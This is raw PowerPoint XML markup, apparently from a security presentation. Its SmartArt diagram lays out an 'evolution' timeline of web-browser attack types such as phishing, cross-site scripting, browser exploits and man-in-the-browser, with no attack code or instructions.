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6"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="361" r:id="rId6"/>
    <p:sldId id="257" r:id="rId7"/>
    <p:sldId id="333" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="367" r:id="rId10"/>
    <p:sldId id="258" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="375" r:id="rId13"/>
    <p:sldId id="374" r:id="rId14"/>
    <p:sldId id="264" r:id="rId15"/>
    <p:sldId id="363" r:id="rId16"/>
    <p:sldId id="364" r:id="rId17"/>
    <p:sldId id="369" r:id="rId18"/>
    <p:sldId id="276" r:id="rId19"/>
    <p:sldId id="376" r:id="rId20"/>
    <p:sldId id="267" r:id="rId21"/>
    <p:sldId id="268" r:id="rId22"/>
    <p:sldId id="272" r:id="rId23"/>
    <p:sldId id="270" r:id="rId24"/>
    <p:sldId id="274" r:id="rId25"/>
    <p:sldId id="277" r:id="rId26"/>
    <p:sldId id="366" r:id="rId27"/>
    <p:sldId id="334" r:id="rId28"/>
    <p:sldId id="373" r:id="rId29"/>
    <p:sldId id="360" r:id="rId30"/>
    <p:sldId id="372" r:id="rId31"/>
    <p:sldId id="309" r:id="rId32"/>
    <p:sldId id="271" r:id="rId33"/>
    <p:sldId id="279" r:id="rId34"/>
    <p:sldId id="280" r:id="rId35"/>
    <p:sldId id="301" r:id="rId36"/>
    <p:sldId id="286" r:id="rId37"/>
    <p:sldId id="282" r:id="rId38"/>
    <p:sldId id="303" r:id="rId39"/>
    <p:sldId id="305" r:id="rId40"/>
    <p:sldId id="378" r:id="rId41"/>
    <p:sldId id="288" r:id="rId42"/>
    <p:sldId id="379" r:id="rId43"/>
    <p:sldId id="302" r:id="rId44"/>
    <p:sldId id="380" r:id="rId45"/>
    <p:sldId id="381" r:id="rId46"/>
    <p:sldId id="304" r:id="rId47"/>
    <p:sldId id="382" r:id="rId48"/>
    <p:sldId id="287" r:id="rId49"/>
    <p:sldId id="345" r:id="rId50"/>
    <p:sldId id="346" r:id="rId51"/>
    <p:sldId id="289" r:id="rId52"/>
    <p:sldId id="359" r:id="rId53"/>
    <p:sldId id="313" r:id="rId54"/>
    <p:sldId id="355" r:id="rId55"/>
    <p:sldId id="357" r:id="rId56"/>
    <p:sldId id="292" r:id="rId57"/>
    <p:sldId id="339" r:id="rId58"/>
    <p:sldId id="341" r:id="rId59"/>
    <p:sldId id="340" r:id="rId60"/>
    <p:sldId id="370" r:id="rId61"/>
    <p:sldId id="351" r:id="rId62"/>
    <p:sldId id="383" r:id="rId63"/>
    <p:sldId id="377" r:id="rId64"/>
    <p:sldId id="261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2E0CB5-3711-4819-9275-04072CE2A868}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="361"/>
            <p14:sldId id="257"/>
            <p14:sldId id="333"/>
            <p14:sldId id="262"/>
            <p14:sldId id="367"/>
            <p14:sldId id="258"/>
            <p14:sldId id="263"/>
            <p14:sldId id="375"/>
            <p14:sldId id="374"/>
            <p14:sldId id="264"/>
            <p14:sldId id="363"/>
            <p14:sldId id="364"/>
            <p14:sldId id="369"/>
            <p14:sldId id="276"/>
            <p14:sldId id="376"/>
            <p14:sldId id="267"/>
            <p14:sldId id="268"/>
            <p14:sldId id="272"/>
            <p14:sldId id="270"/>
            <p14:sldId id="274"/>
            <p14:sldId id="277"/>
            <p14:sldId id="366"/>
            <p14:sldId id="334"/>
            <p14:sldId id="373"/>
            <p14:sldId id="360"/>
            <p14:sldId id="372"/>
            <p14:sldId id="309"/>
            <p14:sldId id="271"/>
            <p14:sldId id="279"/>
            <p14:sldId id="280"/>
            <p14:sldId id="301"/>
            <p14:sldId id="286"/>
            <p14:sldId id="282"/>
            <p14:sldId id="303"/>
            <p14:sldId id="305"/>
            <p14:sldId id="378"/>
            <p14:sldId id="288"/>
            <p14:sldId id="379"/>
            <p14:sldId id="302"/>
            <p14:sldId id="380"/>
            <p14:sldId id="381"/>
            <p14:sldId id="304"/>
            <p14:sldId id="382"/>
            <p14:sldId id="287"/>
            <p14:sldId id="345"/>
            <p14:sldId id="346"/>
            <p14:sldId id="289"/>
            <p14:sldId id="359"/>
            <p14:sldId id="313"/>
            <p14:sldId id="355"/>
            <p14:sldId id="357"/>
            <p14:sldId id="292"/>
            <p14:sldId id="339"/>
            <p14:sldId id="341"/>
            <p14:sldId id="340"/>
            <p14:sldId id="370"/>
            <p14:sldId id="351"/>
            <p14:sldId id="383"/>
            <p14:sldId id="377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88776" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="151" d="100"/>
          <a:sy n="151" d="100"/>
        </p:scale>
        <p:origin x="106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04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6432A3-662A-436B-8E3F-938766070666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4DDC91E0-EF2E-4009-89AB-86061C1D5FB0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000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Stone Age</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C98EF444-B37C-4C61-8EC0-9FE8EF8D647E}" type="parTrans" cxnId="{42B80FB3-4411-480B-B97D-BFFA722108FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{293180DD-922A-48AF-9B13-0EFD6E3F6D0C}" type="sibTrans" cxnId="{42B80FB3-4411-480B-B97D-BFFA722108FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E30A5E2C-D5EB-44AA-A747-46D09FF241D6}">
      <dgm:prSet phldrT="[Text]" custT="1"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1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Bronze Age</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1D4EADAA-2549-4179-9222-DA1387E2C0B3}" type="parTrans" cxnId="{A4A75DB1-E62D-410E-B893-941360D9EDA2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B23E69CA-790A-46F9-9C96-521C63DEBCA4}" type="sibTrans" cxnId="{A4A75DB1-E62D-410E-B893-941360D9EDA2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{656E5335-F643-4C6B-BC39-C401D83F4A2A}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr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1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Iron Age</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90129D6F-9F02-4F6E-96C5-8C065DC74959}" type="parTrans" cxnId="{8D773734-0BA5-4F97-B165-9662A1D22620}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{754D15AD-F63B-4143-AEA9-6B529F2438D7}" type="sibTrans" cxnId="{8D773734-0BA5-4F97-B165-9662A1D22620}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D8491FA-9280-447C-AEE4-B59753BC5EC9}">
      <dgm:prSet phldrT="[Text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1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Today and Beyond</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85BB9825-673A-467B-9B35-D42142C80342}" type="parTrans" cxnId="{511AD79A-7DD2-490A-9158-80787AC46B8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78D05F0F-E434-4B02-956C-D14E36F06E62}" type="sibTrans" cxnId="{511AD79A-7DD2-490A-9158-80787AC46B8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{34813B92-B213-415E-B5C9-DB13417B2854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>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Generic phishing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07A78073-0F7B-452A-9100-2A2EDF132F3F}" type="parTrans" cxnId="{EAF31A2A-2D6A-451A-983E-5386B5F03E4B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{818729F1-3367-4EAE-8C72-2048B8D12C37}" type="sibTrans" cxnId="{EAF31A2A-2D6A-451A-983E-5386B5F03E4B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6F12C081-47FF-4672-AF6A-D94963EAB28D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>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Popup-based redirection</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73AB9A30-AB93-48E9-A3B3-63D4A168578E}" type="parTrans" cxnId="{E4C86698-17D7-4F1E-AD3F-73AE33F701C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6785A023-168F-442B-A66D-912D22E38037}" type="sibTrans" cxnId="{E4C86698-17D7-4F1E-AD3F-73AE33F701C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{279B291C-FEFB-476B-AD70-D193F75E62F0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800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Script-bombing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1057219D-2923-4A41-B1C8-9215F9DBADE8}" type="parTrans" cxnId="{CD485487-2726-4D7A-8661-BCCF40772BFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8BDFAF9A-4791-4DAD-970F-A956A7380DC5}" type="sibTrans" cxnId="{CD485487-2726-4D7A-8661-BCCF40772BFC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED8ABDD1-B1F8-48F7-A38C-A30AECEC3A6B}">
      <dgm:prSet phldrT="[Text]" custT="1"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800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Improved phishing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8B6ABEF0-C3B2-4502-91EC-8C32CB70267D}" type="parTrans" cxnId="{B068F758-E1B5-45A1-8D47-ED2FE2333573}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8567AEB-DD25-4441-8FB3-0798370907ED}" type="sibTrans" cxnId="{B068F758-E1B5-45A1-8D47-ED2FE2333573}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE25965B-ADEE-4FCA-AAD2-D4178994713C}">
      <dgm:prSet custT="1"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800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Cross-site scripting</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B4EFA9C-C47E-4C7B-A48B-3FFEE03B34A9}" type="parTrans" cxnId="{8F863AB3-5D79-4D2F-9D20-08E990E98FFB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AE4838A-5B01-4C78-8BC9-DAC90E15B77E}" type="sibTrans" cxnId="{8F863AB3-5D79-4D2F-9D20-08E990E98FFB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E66F6F85-A9D3-4151-8E48-19AA54CF3AF9}">
      <dgm:prSet custT="1"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800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Browser exploit</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3425E773-7A8C-408E-9E31-C1509998BE46}" type="parTrans" cxnId="{3CCDD9B1-3A1E-48EA-A3A9-BD7249B3AE71}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FB16E82-4D60-4968-8C3F-0444FDB6FA51}" type="sibTrans" cxnId="{3CCDD9B1-3A1E-48EA-A3A9-BD7249B3AE71}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3EAE7E36-47EC-477E-A5C0-6946D10F0B5A}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr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800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Spear phishing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{404168EF-632C-43AA-89EB-D320C20F7A30}" type="parTrans" cxnId="{8AB2DCDF-82C1-4ABA-AA30-96ADF724D287}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7ACDEF30-B706-4248-A7D8-B2518C03CDD8}" type="sibTrans" cxnId="{8AB2DCDF-82C1-4ABA-AA30-96ADF724D287}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B548609C-DCB9-46E1-AA4D-E6A6F77A6D10}">
      <dgm:prSet custT="1"/>
      <dgm:spPr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800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Plug-in exploit</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A58AF34D-85FC-423F-AB8E-5B43FA338B4B}" type="parTrans" cxnId="{919153B5-0C2B-441C-8B65-247239BE3FB2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74D01219-2FAC-4C7B-A61C-9BAAF3238FDC}" type="sibTrans" cxnId="{919153B5-0C2B-441C-8B65-247239BE3FB2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BF43BED3-9958-4CC3-96BB-ED983618227A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:ln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800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Customized browser exploit</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8F2376A-251D-41F9-915A-D706E5E40193}" type="parTrans" cxnId="{9775B1B1-FBA6-417C-AB25-101ADBA1BCFD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37A41A5F-6869-45FC-8C59-F6EF7BC90582}" type="sibTrans" cxnId="{9775B1B1-FBA6-417C-AB25-101ADBA1BCFD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B84D3E8B-D501-48C0-90A7-FA99253F8B0C}">
      <dgm:prSet phldrT="[Text]"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800" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>MitB</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2380E236-AE49-4733-A008-5448130B8DF1}" type="parTrans" cxnId="{5E83D7F5-71A5-44D4-B409-F16FF3B87FA2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F04BF606-A33E-4B54-84E9-C38709EB55A7}" type="sibTrans" cxnId="{5E83D7F5-71A5-44D4-B409-F16FF3B87FA2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{57DECEC0-0016-41B5-8E76-CD378CAF1352}">
      <dgm:prSet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800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>HTML5-based attacks.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F2BE6A0-7017-476D-97AC-0542EA8EAB62}" type="parTrans" cxnId="{ADE3ABB5-E28D-4DAC-9317-764B7A8D0936}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F5E32CA-A47A-437F-B7F9-D83E173936A0}" type="sibTrans" cxnId="{ADE3ABB5-E28D-4DAC-9317-764B7A8D0936}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6683F241-EAAC-4B1A-ADEF-408EA235692A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Advanced spear phishing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6A8B4BC-04CE-4980-9065-8CC030E5AA2C}" type="parTrans" cxnId="{5578F0B0-3D64-4AB3-AC93-FF239332FB67}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{389DBCD9-3600-4D27-AC64-5B78D4EBF845}" type="sibTrans" cxnId="{5578F0B0-3D64-4AB3-AC93-FF239332FB67}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8237A5D-2166-4DB7-BCCC-A19EF030EC1E}" type="pres">
      <dgm:prSet presAssocID="{C76432A3-662A-436B-8E3F-938766070666}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F71A225B-2645-4DA3-94BB-883C665E585D}" type="pres">
      <dgm:prSet presAssocID="{4DDC91E0-EF2E-4009-89AB-86061C1D5FB0}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FA98079A-098B-46C6-8A0D-7B42B3065596}" type="pres">
      <dgm:prSet presAssocID="{4DDC91E0-EF2E-4009-89AB-86061C1D5FB0}" presName="bgChev" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{E71B10DC-9D54-4B80-8C10-A7DD07308FE1}" type="pres">
      <dgm:prSet presAssocID="{4DDC91E0-EF2E-4009-89AB-86061C1D5FB0}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BFC56CBC-DC9D-4422-A585-792181559A67}" type="pres">
      <dgm:prSet presAssocID="{293180DD-922A-48AF-9B13-0EFD6E3F6D0C}" presName="compositeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ECCDC805-FBA3-4F79-BE10-0B5D7E743ECD}" type="pres">
      <dgm:prSet presAssocID="{E30A5E2C-D5EB-44AA-A747-46D09FF241D6}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5698D94-45B0-497D-B446-AD09A61D641D}" type="pres">
      <dgm:prSet presAssocID="{E30A5E2C-D5EB-44AA-A747-46D09FF241D6}" presName="bgChev" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent3">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{03E87BF4-59B7-411F-839E-242C624086A8}" type="pres">
      <dgm:prSet presAssocID="{E30A5E2C-D5EB-44AA-A747-46D09FF241D6}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9D872353-2F57-4CA8-96B6-C800A08297DA}" type="pres">
      <dgm:prSet presAssocID="{B23E69CA-790A-46F9-9C96-521C63DEBCA4}" presName="compositeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1F5F19CB-945E-491F-88CF-A23FEA897738}" type="pres">
      <dgm:prSet presAssocID="{656E5335-F643-4C6B-BC39-C401D83F4A2A}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D369FCE2-F72D-4605-88EE-F27139726154}" type="pres">
      <dgm:prSet presAssocID="{656E5335-F643-4C6B-BC39-C401D83F4A2A}" presName="bgChev" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:lumMod val="40000"/>
            <a:lumOff val="60000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{193A4E96-EA76-455A-B306-097368F63BAF}" type="pres">
      <dgm:prSet presAssocID="{656E5335-F643-4C6B-BC39-C401D83F4A2A}" presName="txNode" presStyleLbl="fgAcc1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C091CC9-8313-46D6-8010-7996091C5D72}" type="pres">
      <dgm:prSet presAssocID="{754D15AD-F63B-4143-AEA9-6B529F2438D7}" presName="compositeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{911C4340-3FDA-40AC-A5AD-31F5495E9224}" type="pres">
      <dgm:prSet presAssocID="{5D8491FA-9280-447C-AEE4-B59753BC5EC9}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2AF053C6-5151-4B84-BEB6-6072A5037075}" type="pres">
      <dgm:prSet presAssocID="{5D8491FA-9280-447C-AEE4-B59753BC5EC9}" presName="bgChev" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{229336F8-42EF-412A-B5A9-511619FAC596}" type="pres">
      <dgm:prSet presAssocID="{5D8491FA-9280-447C-AEE4-B59753BC5EC9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B2652500-D0DC-4460-A1F2-FE59C75C3143}" type="presOf" srcId="{B548609C-DCB9-46E1-AA4D-E6A6F77A6D10}" destId="{193A4E96-EA76-455A-B306-097368F63BAF}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{11326B14-B407-4539-9C79-E6203B7754FA}" type="presOf" srcId="{656E5335-F643-4C6B-BC39-C401D83F4A2A}" destId="{193A4E96-EA76-455A-B306-097368F63BAF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{648CDC16-2EF1-43D0-9AC8-95408D19A9A2}" type="presOf" srcId="{5D8491FA-9280-447C-AEE4-B59753BC5EC9}" destId="{229336F8-42EF-412A-B5A9-511619FAC596}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
